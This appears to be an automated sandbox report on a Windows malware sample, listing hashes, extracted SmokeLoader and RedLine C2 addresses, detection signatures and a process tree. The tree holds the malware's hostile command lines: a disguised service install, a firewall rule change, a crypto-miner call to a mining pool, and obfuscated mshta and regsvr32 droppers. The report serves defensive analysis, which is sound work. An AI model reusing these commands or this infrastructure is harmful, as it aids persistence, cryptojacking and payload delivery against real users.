Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    1748s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-07-2021 16:08

General

  • Target

    toolspab2 (11).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

C2

82.202.161.37:26317

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1192
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      PID:2836
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        PID:4956
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2764
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2492
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1820
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1408
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1232
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1056
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:788
                        • C:\Users\Admin\AppData\Roaming\cbsafjc
                          C:\Users\Admin\AppData\Roaming\cbsafjc
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:2000
                        • C:\Users\Admin\AppData\Roaming\vusafjc
                          C:\Users\Admin\AppData\Roaming\vusafjc
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:744
                          • C:\Users\Admin\AppData\Roaming\vusafjc
                            C:\Users\Admin\AppData\Roaming\vusafjc
                            3⤵
                            • Executes dropped EXE
                            PID:1740
                        • C:\Users\Admin\AppData\Roaming\cbsafjc
                          C:\Users\Admin\AppData\Roaming\cbsafjc
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          PID:4520
                        • C:\Users\Admin\AppData\Roaming\vusafjc
                          C:\Users\Admin\AppData\Roaming\vusafjc
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4180
                          • C:\Users\Admin\AppData\Roaming\vusafjc
                            C:\Users\Admin\AppData\Roaming\vusafjc
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            PID:5116
                        • C:\Users\Admin\AppData\Roaming\cbsafjc
                          C:\Users\Admin\AppData\Roaming\cbsafjc
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          PID:68
                        • C:\Users\Admin\AppData\Roaming\vusafjc
                          C:\Users\Admin\AppData\Roaming\vusafjc
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4712
                          • C:\Users\Admin\AppData\Roaming\vusafjc
                            C:\Users\Admin\AppData\Roaming\vusafjc
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            PID:4876
                      • C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe
                        "C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe"
                        1⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:4060
                        • C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe
                          "C:\Users\Admin\AppData\Local\Temp\toolspab2 (11).exe"
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:3496
                      • C:\Users\Admin\AppData\Local\Temp\566E.exe
                        C:\Users\Admin\AppData\Local\Temp\566E.exe
                        1⤵
                        • Executes dropped EXE
                        PID:3624
                      • C:\Users\Admin\AppData\Local\Temp\615C.exe
                        C:\Users\Admin\AppData\Local\Temp\615C.exe
                        1⤵
                        • Executes dropped EXE
                        PID:3772
                      • C:\Users\Admin\AppData\Local\Temp\6871.exe
                        C:\Users\Admin\AppData\Local\Temp\6871.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3024
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:3356
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:3788
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:2100
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              1⤵
                              • Suspicious behavior: MapViewOfSection
                              PID:2068
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:1500
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe
                                1⤵
                                • Suspicious behavior: MapViewOfSection
                                PID:1736
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:3752
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2916
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:1548
                                  • C:\Users\Admin\AppData\Local\Temp\4A18.exe
                                    C:\Users\Admin\AppData\Local\Temp\4A18.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3756
                                  • C:\Users\Admin\AppData\Local\Temp\5275.exe
                                    C:\Users\Admin\AppData\Local\Temp\5275.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:1164
                                    • C:\Users\Admin\AppData\Local\Temp\is-9T6EI.tmp\5275.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-9T6EI.tmp\5275.tmp" /SL5="$40118,506127,422400,C:\Users\Admin\AppData\Local\Temp\5275.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:3028
                                      • C:\Users\Admin\AppData\Local\Temp\is-K4N16.tmp\1075474_ah_hot_iconçè_)))_.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-K4N16.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Drops file in Program Files directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2352
                                        • C:\Users\Admin\AppData\Local\Temp\2d-09102-77a-b2aa5-49621afca0869\Raxeluneti.exe
                                          "C:\Users\Admin\AppData\Local\Temp\2d-09102-77a-b2aa5-49621afca0869\Raxeluneti.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:2776
                                        • C:\Users\Admin\AppData\Local\Temp\7f-cd690-6f8-45291-7db34219315b9\Junylalibo.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7f-cd690-6f8-45291-7db34219315b9\Junylalibo.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1224
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pxcjefm3.4gb\GcleanerEU.exe /eufive & exit
                                            5⤵
                                              PID:4800
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s1rvac0l.zqu\installer.exe /qn CAMPAIGN="654" & exit
                                              5⤵
                                                PID:5048
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\by0ljbu0.hay\google-game.exe & exit
                                                5⤵
                                                  PID:4192
                                                  • C:\Users\Admin\AppData\Local\Temp\by0ljbu0.hay\google-game.exe
                                                    C:\Users\Admin\AppData\Local\Temp\by0ljbu0.hay\google-game.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4332
                                                    • C:\Users\Admin\AppData\Local\Temp\by0ljbu0.hay\google-game.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\by0ljbu0.hay\google-game.exe" -a
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4528
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qr321tg1.ikb\GcleanerWW.exe /mixone & exit
                                                  5⤵
                                                    PID:4300
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h5whozmr.vpn\toolspab1.exe & exit
                                                    5⤵
                                                      PID:4528
                                                      • C:\Users\Admin\AppData\Local\Temp\h5whozmr.vpn\toolspab1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\h5whozmr.vpn\toolspab1.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4664
                                                        • C:\Users\Admin\AppData\Local\Temp\h5whozmr.vpn\toolspab1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\h5whozmr.vpn\toolspab1.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:1844
                                            • C:\Users\Admin\AppData\Local\Temp\57F5.exe
                                              C:\Users\Admin\AppData\Local\Temp\57F5.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:2180
                                              • C:\Users\Admin\AppData\Local\Temp\57F5.exe
                                                "C:\Users\Admin\AppData\Local\Temp\57F5.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                • Modifies system certificate store
                                                PID:2388
                                            • C:\Users\Admin\AppData\Local\Temp\59CA.exe
                                              C:\Users\Admin\AppData\Local\Temp\59CA.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:1840
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jmmqrbux\
                                                2⤵
                                                  PID:4008
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bnmrqigr.exe" C:\Windows\SysWOW64\jmmqrbux\
                                                  2⤵
                                                    PID:2848
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    "C:\Windows\System32\sc.exe" create jmmqrbux binPath= "C:\Windows\SysWOW64\jmmqrbux\bnmrqigr.exe /d\"C:\Users\Admin\AppData\Local\Temp\59CA.exe\"" type= own start= auto DisplayName= "wifi support"
                                                    2⤵
                                                      PID:1708
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      "C:\Windows\System32\sc.exe" description jmmqrbux "wifi internet conection"
                                                      2⤵
                                                        PID:3672
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" start jmmqrbux
                                                        2⤵
                                                          PID:1312
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                          2⤵
                                                            PID:996
                                                        • C:\Users\Admin\AppData\Local\Temp\6748.exe
                                                          C:\Users\Admin\AppData\Local\Temp\6748.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Modifies system certificate store
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1536
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            2⤵
                                                              PID:2152
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                3⤵
                                                                • Kills process with taskkill
                                                                PID:2628
                                                          • C:\Users\Admin\AppData\Local\Temp\6BED.exe
                                                            C:\Users\Admin\AppData\Local\Temp\6BED.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3180
                                                          • C:\Windows\SysWOW64\jmmqrbux\bnmrqigr.exe
                                                            C:\Windows\SysWOW64\jmmqrbux\bnmrqigr.exe /d"C:\Users\Admin\AppData\Local\Temp\59CA.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4040
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              svchost.exe
                                                              2⤵
                                                              • Drops file in System32 directory
                                                              • Suspicious use of SetThreadContext
                                                              • Modifies data under HKEY_USERS
                                                              PID:3572
                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                3⤵
                                                                  PID:3932
                                                            • C:\Users\Admin\AppData\Local\Temp\78A0.exe
                                                              C:\Users\Admin\AppData\Local\Temp\78A0.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:2172
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll" ). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\78A0.exe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if """" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\78A0.exe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE ) )
                                                                2⤵
                                                                  PID:2132
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\78A0.exe" > 0~NM~WIL.eXe &&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "" == "" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\78A0.exe" ) do taskkill -F /IM "%~NXD"
                                                                    3⤵
                                                                      PID:3088
                                                                      • C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe
                                                                        0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:3064
                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                          "C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll" ). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if ""/pwIz2i2S0CJRBKmE4 "" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE ) )
                                                                          5⤵
                                                                            PID:2860
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" > 0~NM~WIL.eXe &&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "/pwIz2i2S0CJRBKmE4 " == "" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" ) do taskkill -F /IM "%~NXD"
                                                                              6⤵
                                                                                PID:2544
                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                              "C:\Windows\System32\mshta.exe" vbsCRiPT: CLosE ( cREATEObjECt ( "WsCrIpT.ShElL" ). RUn ( "CmD /q /C EchO 90tQ%daTe%PSA> YAEF9Fv.MI & ECHo | seT /p = ""MZ"" > s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 + 1LIRC.u + SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u " , 0 , TRue) )
                                                                              5⤵
                                                                                PID:1524
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /q /C EchO 90tQÚTe%PSA> YAEF9Fv.MI & ECHo | seT /p = "MZ" >s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 + 1LIRC.u +SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u
                                                                                  6⤵
                                                                                    PID:496
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" ECHo "
                                                                                      7⤵
                                                                                        PID:1052
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>s1S8NN.3F"
                                                                                        7⤵
                                                                                          PID:2544
                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                          regsvr32.exe -s XN9IONS.VC /u
                                                                                          7⤵
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                          PID:3420
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill -F /IM "78A0.exe"
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3836
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:2300
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4400
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4604
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3500
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              PID:4876
                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              1⤵
                                                                              • Process spawned unexpected child process
                                                                              PID:5056
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                PID:4776
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                                PID:196
                                                                                • C:\Windows\system32\WerFault.exe
                                                                                  C:\Windows\system32\WerFault.exe -u -p 196 -s 1840
                                                                                  2⤵
                                                                                  • Program crash
                                                                                  PID:4544
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:4256
                                                                                • C:\Windows\system32\WerFault.exe
                                                                                  C:\Windows\system32\WerFault.exe -u -p 4256 -s 1796
                                                                                  2⤵
                                                                                  • Program crash
                                                                                  PID:4516
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                  PID:4652
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                    PID:3336
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5056
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    PID:3164
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:1604
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:1524
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                      PID:4844
